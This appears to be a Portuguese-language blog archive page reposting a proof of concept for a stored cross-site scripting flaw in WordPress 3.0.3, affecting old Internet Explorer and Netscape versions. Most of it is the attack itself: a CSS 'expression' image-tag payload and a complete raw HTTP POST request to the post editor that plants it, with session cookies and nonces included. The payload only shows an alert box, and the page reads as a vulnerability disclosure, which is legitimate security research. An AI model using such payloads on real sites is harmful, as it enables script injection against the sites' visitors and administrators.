Assinatura RSS

Arquivo da tag: XSS

Wordpress 3.0.3 Stored XSS

Publicado em

Software: wordpress.org

Versão: 3.0.3

Browsers afetados: IE7,6 NS8.1

Autor: Saif

Xss na pagina de post usando estilo CSS

Poc: Postagem com "<IMG STYLE="xss:expression(alert('XSS'))">"

Ou vc pode usar raw request pra implantar o parâmetro com o XSS


POST /wordpress/wp-admin/post.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1
Cookie:
wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;
wp-settings-time-1=1293196695; wp-settings-time-2=1293197912;
wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;
wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;
PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;
kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;
AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq
Content-Type: application/x-www-form-urlencoded
Content-Length: 1655

_wpnonce=aad1243dc1&_wp_http_referer=/wordpress/wp-admin/post.php?post=145&action=edit&message=1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&_wp_original_http_referer=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category[]=0&post_category[]=1&tax_input[post_tag]=&newtag[post_tag]=&post_title=&samplepermalinknonce=ffcbf222eb&content=<IMG+STYLE="xss:expression(alert('XSS'))">&excerpt=&trackback_url=&meta[108][key]=_edit_last&_ajax_nonce=257f6f6ad9&meta[108][value]=3&meta[111][key]=_edit_lock&_ajax_nonce=257f6f6ad9&meta[111][value]=1293465765&meta[116][key]=_encloseme&_ajax_nonce=257f6f6ad9&meta[116][value]=1&meta[110][key]=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta[110][value]=&metakeyselect=#NONE#&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145